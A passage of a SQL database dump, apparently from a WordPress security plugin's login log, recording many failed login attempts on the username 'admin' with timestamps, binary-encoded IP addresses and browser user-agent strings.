Firefox/62.0'),(5271,7075,1629294021.100752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5272,7080,1629294409.621063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5273,7083,1629294767.050648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�2�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5274,7084,1629295200.951709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5275,7093,1629295575.192893,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5276,7096,1629295929.258027,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5277,7099,1629296375.453081,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5278,7102,1629296769.220356,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5279,7102,1629296769.239706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5280,7107,1629297187.892950,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5281,7110,1629297523.718916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5282,7111,1629297880.818126,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5283,7112,1629297881.647496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5284,7113,1629297911.558745,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5285,7114,1629298067.716022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5286,7115,1629298068.438639,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5287,7116,1629298265.901252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5288,7117,1629298266.382584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5289,7118,1629298613.312850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5290,7119,1629298613.912079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5291,7120,1629298741.135926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5292,7121,1629298857.806122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y�g','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(5293,7122,1629299012.367651,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5294,7123,1629299013.666905,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5295,7124,1629299359.547187,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5296,7125,1629299361.685923,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5297,7126,1629299525.413391,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5298,7127,1629299537.200130,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5299,7128,1629299546.890680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5300,7129,1629299658.234384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(5301,7130,1629299854.396730,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5302,7131,1629299854.957973,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5303,7132,1629299903.290928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5304,7133,1629300119.731404,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5305,7134,1629300120.521691,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5306,7135,1629300303.552786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5307,7136,1629300335.293208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5308,7138,1629300471.596633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(5309,7141,1629300701.788925,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5310,7146,1629301077.931293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5311,7147,1629301256.611162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(5312,7148,1629301488.972629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���kb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5313,7153,1629301830.103715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/k!\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5314,7156,1629302256.622186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5315,7159,1629302623.153012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��w��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5316,7160,1629302788.940011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5317,7163,1629303044.234053,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gmш','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5318,7166,1629303453.532826,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5319,7167,1629303545.853432,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(5320,7172,1629303810.862245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5321,7177,1629304220.019578,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5322,7178,1629304306.902405,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5323,7181,1629304597.122685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5324,7184,1629305028.435617,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5325,7187,1629305075.745346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����^�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5326,7192,1629305394.585315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5327,7195,1629305742.882488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5328,7198,1629305838.699280,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5329,7205,1629306608.804694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo6','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(5330,7218,1629307371.933837,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5331,7218,1629307371.978859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���=��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5332,7227,1629308134.843760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�Sq','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(5333,7232,1629308895.408036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�Sq','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(5334,7241,1629309662.857100,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5335,7250,1629310423.346634,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5336,7265,1629311935.810616,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5337,7296,1629314248.878194,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5338,7301,1629314740.517764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5339,7302,1629314742.696553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5340,7303,1629314943.760543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5341,7304,1629314944.289156,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5342,7305,1629315021.142534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5343,7306,1629315093.876716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5344,7307,1629315094.486267,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5345,7308,1629315158.456344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5346,7309,1629315160.086998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5347,7310,1629315378.767436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5348,7311,1629315379.364293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5349,7312,1629315461.211587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5350,7313,1629315462.200740,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5351,7314,1629315549.677146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5352,7315,1629315552.535648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5353,7316,1629315629.028019,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5354,7317,1629315629.630542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5355,7318,1629315787.575324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��R@�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5356,7319,1629315853.514561,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5357,7320,1629315855.017604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5358,7321,1629315928.731987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(5359,7333,1629316564.588040,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(5360,7350,1629317332.721729,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(5361,7363,1629318104.307543,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3M�\"','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5362,7410,1629320409.854263,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5363,7427,1629321187.938916,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5364,7442,1629321967.435517,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5365,7455,1629322751.346225,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ԯ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(5366,7456,1629323530.733875,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5367,7457,1629323612.143597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5368,7458,1629323612.791065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5369,7459,1629323613.913071,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5370,7460,1629323614.489773,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5371,7461,1629323615.052507,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5372,7462,1629323615.919057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5373,7463,1629323616.507158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5374,7464,1629323617.010853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5375,7465,1629323617.553419,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5376,7466,1629323618.127094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5377,7467,1629323618.662911,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5378,7468,1629323619.281385,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5379,7469,1629323620.155965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5380,7469,1629323620.201351,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5381,7470,1629323620.823504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5382,7470,1629323620.902518,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5383,7471,1629323621.491011,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5384,7472,1629323622.014285,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5385,7472,1629323622.097628,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\"','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5386,7474,1629324311.372348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(5387,7475,1629325885.758648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����m','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5388,7476,1629327284.022895,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(5389,7477,1629328849.662811,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(5390,7478,1629330426.745777,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5391,7479,1629331224.646165,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5392,7480,1629332027.793092,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5393,7481,1629332825.528963,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5394,7482,1629333632.203330,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 